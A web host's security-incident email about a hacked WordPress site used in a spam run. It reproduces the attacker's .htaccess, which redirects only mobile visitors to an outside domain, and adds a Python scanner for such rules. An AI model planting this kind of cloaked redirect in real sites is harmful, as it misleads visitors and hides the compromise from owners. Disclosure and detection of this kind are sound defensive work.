Hi,
Yesterday we received numerous abuse reports regarding a web site
hosted at BitFolk being mentioned in an email spam run. The spam
email looked like this:
http://pastie.org/private/vjxjhjkpfxqby0fkrv87oq
(
http://[elided]/wp-content/themes/mantra/uploads/wps.php?v20120226
being the link that was hosted at BitFolk)
The link, when visited from a conventional browser, was a harmless
redirect to microsoft.com; when visited from a mobile browser,
however, it redirected to a porn site.
The customer was contacted and their port 80 immediately firewalled
off.
Later the customer advised that they were unwilling to spend the
time to discover exactly how WordPress had been compromised,
preferring instead to completely remove it.
The following .htaccess file was found in several places throughout
the wp-content directory:
RewriteEngine On
RewriteCond %{HTTP:X-WAP-PROFILE} !^$ [OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(Alcatel|Asus|Android|BlackBerry|Ericsson|Fly|Huawei|i-mate|iPAQ|iPhone|iPod|LG-|LGE-|MDS_|MOT-|Nokia|Palm|Panasonic|Pantech|Philips|Sagem|Samsung|Sharp|SIE-|Symbian|Vodafone|Voxtel|WebOS|Windows\s+CE|ZTE-|Zune).*$ [NC,OR]
RewriteCond %{HTTP_ACCEPT} application/vnd.wap.xhtml\+xml [NC,OR]
RewriteCond %{HTTP_ACCEPT} text/vnd.wap.wml [NC]
RewriteRule ^(.*) http://crzyluxtds.in/go.php?sid=1 [L,R=302]
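The rule above only fires for visitors whose headers look like a mobile device (X-WAP-PROFILE, a device name in the User-Agent, or a WAP Accept type) and then issues an external 302, which is why a desktop check of the site looked clean. A scanner for that shape of rule, added here as an example and not part of the original posting or of BitFolk's tooling; the sample .htaccess and the redirect domain in it are constructed placeholders, not the real one from this incident:

```python
import os
import re

# Constructed sample modelled on the rule found in the incident; the redirect
# target is a placeholder, not the domain from the real .htaccess.
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP:X-WAP-PROFILE} !^$ [OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(Android|BlackBerry|iPhone|Nokia|Symbian).*$ [NC,OR]
RewriteCond %{HTTP_ACCEPT} text/vnd.wap.wml [NC]
RewriteRule ^(.*) http://attacker.invalid/go.php?sid=1 [L,R=302]
# Normal WordPress front controller, must not be flagged
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule . /index.php [L]
"""

# Request headers the cloaking rule keyed on to tell mobile from desktop visitors.
DEVICE_MARKERS = ("HTTP:X-WAP-PROFILE", "HTTP_USER_AGENT", "HTTP_ACCEPT")
# RewriteRule <pattern> <absolute http(s) URL> [<flags>]
RULE_RE = re.compile(r"^RewriteRule\s+\S+\s+(https?://\S+)\s*\[([^\]]*)\]", re.I)

def find_cloaking_rules(text: str) -> list[dict]:
    """Flag RewriteRules that are guarded by RewriteConds on device headers
    and issue an external R= redirect, i.e. the shape of the rule above."""
    findings, conds = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if line.upper().startswith("REWRITECOND"):
            conds.append(line.upper())
        elif line.upper().startswith("REWRITERULE"):
            m = RULE_RE.match(line)
            device_guard = any(mk in c for c in conds for mk in DEVICE_MARKERS)
            if m and device_guard and "R=" in m.group(2).upper():
                findings.append({"target": m.group(1), "flags": m.group(2), "conds": len(conds)})
            conds = []  # RewriteConds apply only to the next RewriteRule
    return findings

def scan_tree(root: str) -> dict[str, list[dict]]:
    """Walk a directory (e.g. wp-content) and report every .htaccess with findings."""
    report = {}
    for dirpath, _, files in os.walk(root):
        if ".htaccess" in files:
            path = os.path.join(dirpath, ".htaccess")
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = find_cloaking_rules(fh.read())
            if hits:
                report[path] = hits
    return report

if __name__ == "__main__":
    for hit in find_cloaking_rules(SAMPLE_HTACCESS):
        print("cloaking redirect ->", hit["target"], hit["flags"])
```

Run scan_tree() against a copy of wp-content to list every .htaccess carrying such a rule; the stock WordPress front-controller rule is not reported because it is neither external nor device-guarded.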
The customer says that no plugins were installed, so it must have
been a base WordPress install that was compromised (it may have been
out of date or installed incorrectly).
Cheers,
Andy
About this email:
https://tools.bitfolk.com/wiki/Security_incident_postings
--
http://bitfolk.com/ -- No-nonsense VPS hosting